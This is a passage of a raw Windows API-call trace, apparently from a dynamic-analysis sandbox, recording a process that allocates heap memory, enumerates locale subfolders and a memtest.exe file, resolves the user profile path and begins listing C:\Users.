returned 0x2d277e8 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27900 [0174.136] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a18 [0174.137] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16c) returned 0x6f5050 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279f0 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27928 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27978 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ae0 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b08 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b30 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b80 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ba8 [0174.137] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27900 [0174.137] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.137] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ab8 [0174.137] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xce3b5a40, ftLastWriteTime.dwHighDateTime=0x1d03f5f, nFileSizeHigh=0x0, nFileSizeLow=0x795b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0174.138] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x214) returned 0x2d2fc98 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a90 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27950 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279a0 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27bd0 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27bf8 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c20 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c70 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c98 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27cc0 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0174.138] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.138] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27900 [0174.138] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a18 [0174.139] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ba8 [0174.139] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b80 [0174.139] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x310) returned 0x2d2feb8 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b30 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b08 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ae0 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27978 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27928 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279f0 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27d10 [0174.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27d38 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27d60 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27d88 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27db0 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27dd8 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27e00 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27e28 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27e50 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27e78 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ea0 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ec8 [0174.140] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ba8 [0174.140] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a18 [0174.141] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0174.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27900 [0174.141] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0174.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.141] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0174.141] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.141] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0174.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.141] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.142] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.142] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.142] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.142] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.142] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.142] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0174.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.143] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.143] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.143] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0174.143] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.143] PathFindFileNameW (pszPath="") returned="" [0174.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.143] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.143] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0174.143] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d165c0 [0174.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ab8 [0174.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278d8 | out: hHeap=0x6a0000) returned 1 [0174.145] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ab8 | out: hHeap=0x6a0000) returned 1 [0174.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ab8 [0174.145] FindFirstFileW (in: lpFileName="C:\\Users\\*" (normalized: "c:\\users\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ab8 | out: hHeap=0x6a0000) returned 1 [0174.146] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.146] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, 